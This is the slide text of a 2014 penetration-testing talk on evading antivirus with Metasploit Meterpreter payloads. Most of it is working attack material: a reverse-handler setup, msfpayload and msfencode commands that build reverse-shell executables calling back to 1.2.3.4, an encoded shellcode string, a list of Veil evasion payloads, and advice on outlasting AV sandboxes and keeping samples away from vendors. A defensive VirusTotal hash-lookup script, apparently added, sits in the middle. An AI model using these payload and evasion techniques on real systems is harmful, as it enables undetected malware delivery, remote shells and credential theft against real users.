Anti-Virus Evasion Deuce
January 3, 2014
Joe Testa
Anti-Virus Got Better

Last January I gave a talk on AV evasion.
I showed how to craft a custom Meterpreter payload.
Some AV products catch that now!
This presentation shows how to get back in business.

Anti-Virus Got Better

A lot of built-in exploits don't work anymore because of AV.
You now have to re-write exploits yourself.
Example: unprotected Tomcat installations can be taken over with the tomcat_mgr_deploy module.
Without AV, you normally get SYSTEM or root.
With AV, you get disappointment.

Goals

Aside from bypassing AV for software exploits, pentesters need a way to conduct social engineering.
Ideally, we would like a reliable way to generate EXE files that run Meterpreter when the user is tricked.
You can write your own custom code, but then how do you safely and reliably steal hashes, hijack tokens, etc.?

Payload Overview

Usually, the EXE doesn't contain Meterpreter itself.
It's a stager, whose only job is to connect back to your Metasploit server and execute what it returns.
For the last two years, pretty much all the Metasploit stagers get caught, no matter how much you encode them.

Payload Server

The server is set up with:

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...

IDS/IPS Evasion

An interesting trick to confuse network IDS/IPS is to encode the payload as it travels over the network.
One way is to set StageEncoder on the server.
You can use shikata_ga_nai, etc.
Last I checked, this is very slow!
Another way is to use the windows/meterpreter/reverse_tcp_rc4 payload.
You set the RC4 key to encrypt communications.

Simple Payloads

The most basic way to create an EXE is like this:

$ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"1.2.3.4", "LPORT"=>"443"}
$ ls -l payload.exe
-rw-r--r-- 1 jdog jdog 73802 Jan 2 20:57 payload.exe
$ file payload.exe
payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows

Simple Payloads

Up until August 2011, you could bypass AV by encoding like so:

$ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 R | msfencode -a x86 -t exe -e x86/shikata_ga_nai -c 9 -o payload.exe
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)

Simple Payloads

Last year I talked about shellcodeexec.
https://github.com/inquisb/shellcodeexec

The punchline is that it takes alphanumeric-encoded shellcode, stuffs it into memory, and executes it:

C:\Documents and Settings\root>sce.exe PYIIIIIIIIIIIIIIII7Q
ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsPnizE4qn2RDNkP
RvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJaxOdMWq
ZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc
1yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT
45ZBShNkf8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV
9qJrqkOIpshCoqJnkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIo
jumhZ0GqUPGpVIYTF4bpPhq9K0BK30iozuF0f0p

Formerly Good Payload

Here's how the alphanumeric shellcode is created:

$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=1.2.3.4 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)

Formerly Good Payload

Microsoft Security Essentials catches this!

Better Payloads

There is a tool called pyinjector which reimplements the essentials of shellcodeexec in Python.
Creates a writeable and executable memory buffer, stuffs code into it, executes it.
You use pyinstaller (http://www.pyinstaller.org/) to create an EXE.
Available at: https://www.trustedsec.com/files/pyinjector.zip

Better Payloads

There is a tool called Hyperion which encrypts an EXE with AES-128.
The output EXE brute-forces part of the key on startup.
http://www.nullsecurity.net/tools/binary/Hyperion-1.0.zip
This prevents AV from extracting the key and decrypting the binary.
The stub code for decryption is static!
It is open source though...

Best Payloads

The Veil project is a toolkit for creating payloads that evade AV.
https://www.veil-evasion.com/
It is a relatively new project, but is actively maintained and developed.
Currently has 22 payloads.

Best Payloads

Current Veil payloads:
c/meterpreter/rev_tcp
c/meterpreter/rev_tcp_service
c/shellcode_inject/virtual
c/shellcode_inject/void
cs/meterpreter/rev_tcp
cs/shellcode_inject/base64_substitution
cs/shellcode_inject/virtual
native/Hyperion
native/backdoor_factory
native/pe_scrambler
powershell/shellcode_inject/download_virtual
powershell/shellcode_inject/psexec_virtual
powershell/shellcode_inject/virtual
python/meterpreter/rev_http_contained
python/meterpreter/rev_https_contained
python/meterpreter/rev_tcp
python/shellcode_inject/aes_encrypt
python/shellcode_inject/arc_encrypt
python/shellcode_inject/base64_substitution
python/shellcode_inject/des_encrypt
python/shellcode_inject/flat
python/shellcode_inject/letter_substitution

Best Payloads

Veil and others seem very useful, but being open source is a bit of a weakness when it comes to AV evasion.
This is the same problem that Metasploit has.
Nothing beats writing something yourself!
Best method is to take what's out there, customize it, and keep it private.

Best Payloads

A blog post on the Veil homepage pointed to information on how to make your own Meterpreter stager.
With shellcodeexec, the idea was to launch the generated stager to connect to the server, download Meterpreter, and execute it.

shellcodeexec → alphanumeric-encoded stager → Meterpreter

Why not write your own stager from scratch?

Best Payloads

Someone showed how to write your own windows/meterpreter/reverse_tcp equivalent.
https://github.com/rsmudge/metasploit-loader
Basically, you open a TCP connection to the Metasploit server, throw the bytes returned into an executable buffer.
Prepend the buffer with a "mov edi, socket_id" instruction, and jump to it.
Meterpreter will then use the existing TCP session.

Best Payloads

How do you customize it?
One of the Metasploit developers mentioned that AV puts new binaries into a sandbox for the first N seconds.
Do innocent things like read the registry, read some config files, compute digits of pi, etc.
Don't sleep to run down the clock!

VirusTotal

VirusTotal (http://www.virustotal.com/) lets you upload binaries to be scanned by 46 AV products.
It's common knowledge that they pass on samples to AV vendors.
They know malware authors use it.
Your target can pull down a signature in as little as one hour.

VirusTotal

vt-notify (https://github.com/mubix/vt-notify) uses the VirusTotal API to check the SHA-1 hash of your payload.
If you don't get your own API key, it uses a built-in one.
It's been incorporated into Veil.
This probably tips them off that it's malware!
Actually... this functionality as a whole was probably designed as a trap!

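The distinction the slide relies on is that a hash lookup sends VirusTotal only a SHA-1, while an upload hands them the sample. The script below is an added example (not vt-notify's or Veil's code) of the lookup side as a defender would use it during triage: hash a file locally, query the v2 file/report endpoint, and reduce the answer to a vendor-detection summary. VT_API_KEY is a placeholder to be supplied from the environment, and the two SAMPLE_* responses are constructed to match the shape of the v2 API, not real VirusTotal output. The caveat worth keeping in mind is in summarize_report: a response_code of 0 only means VirusTotal has never seen that hash, which says nothing about whether the file is clean.

```python
"""Look up a file's SHA-1 on VirusTotal without uploading the file (added example)."""
import hashlib
import json
import os
import urllib.parse
import urllib.request

# Placeholder: a real key comes from a VirusTotal account, never a shared built-in one.
VT_API_KEY = os.environ.get("VT_API_KEY", "<your-api-key>")
VT_REPORT_URL = "https://www.virustotal.com/vtapi/v2/file/report"


def sha1_of_bytes(data):
    """SHA-1 of an in-memory buffer, as a lowercase hex string."""
    return hashlib.sha1(data).hexdigest()


def sha1_of_file(path):
    """Stream the file through SHA-1 so large binaries never have to fit in memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_report_request(sha1_hex, api_key=VT_API_KEY):
    """Build the GET URL for the v2 file/report call. Only the hash leaves the host;
    the sample itself stays local."""
    params = urllib.parse.urlencode({"resource": sha1_hex, "apikey": api_key})
    return VT_REPORT_URL + "?" + params


def summarize_report(report):
    """Reduce a v2 file/report JSON object to what triage needs.
    response_code 1 means the hash is known; 0 means VirusTotal has never seen it,
    which is NOT evidence that the file is benign."""
    if report.get("response_code") != 1:
        return {"known": False, "positives": 0, "total": 0, "detections": {}}
    scans = report.get("scans", {})
    # Keep only vendors that flagged the sample, with the name they gave it.
    detections = {vendor: r.get("result")
                  for vendor, r in scans.items() if r.get("detected")}
    return {"known": True,
            "positives": report.get("positives", len(detections)),
            "total": report.get("total", len(scans)),
            "detections": detections}


def lookup(path, api_key=VT_API_KEY, timeout=20):
    """Hash the file at `path` and return the summarized VirusTotal report (network call)."""
    url = build_report_request(sha1_of_file(path), api_key)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return summarize_report(json.load(resp))


# Constructed sample responses in the shape of the v2 API; not real VirusTotal output.
SAMPLE_UNKNOWN = {"response_code": 0, "verbose_msg": "resource not found"}
SAMPLE_KNOWN = {
    "response_code": 1,
    "positives": 2,
    "total": 3,
    "scans": {
        "VendorA": {"detected": True, "result": "Trojan.Generic"},
        "VendorB": {"detected": False, "result": None},
        "VendorC": {"detected": True, "result": "Backdoor.Meterpreter"},
    },
}

if __name__ == "__main__":
    import sys
    # Usage: VT_API_KEY=... python vt_lookup.py <file>
    print(json.dumps(lookup(sys.argv[1]), indent=2))
```

Because the request carries only the digest, this is the query a SOC can safely run on an unknown binary before deciding whether to submit it; an "unknown" answer is the cue to sandbox or analyze locally, not to close the ticket.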
Building an AV Lab

The best way to check your payload is by building your own AV lab.
VirusTotal has 46 products, but how many corporate environments use "Kingsoft AV"?
Symantec and McAfee seem to have the overwhelming market share.
Maybe throw in Kaspersky for good measure too...

Building an AV Lab

MSDN Operating Systems subscription is $700 for 1 year.
Symantec Small Business Edition costs $60 for a 3 year subscription for 1 endpoint.
McAfee SaaS Endpoint Protection costs $52.
Make sure the AV products don't phone home!

Building an AV Lab

I'm now actively building this lab.
Once it's set up, I'm going to evaluate all these evasion tools.
If anyone wants to test some payloads, just let me know!

Conclusion

To be a good pentester, you need to know how to bypass AV.
Many built-in Metasploit modules no longer work. You have to re-write some or find alternatives.
The success of your engagement can entirely depend upon how well you can adapt.
Being a programmer is extremely valuable!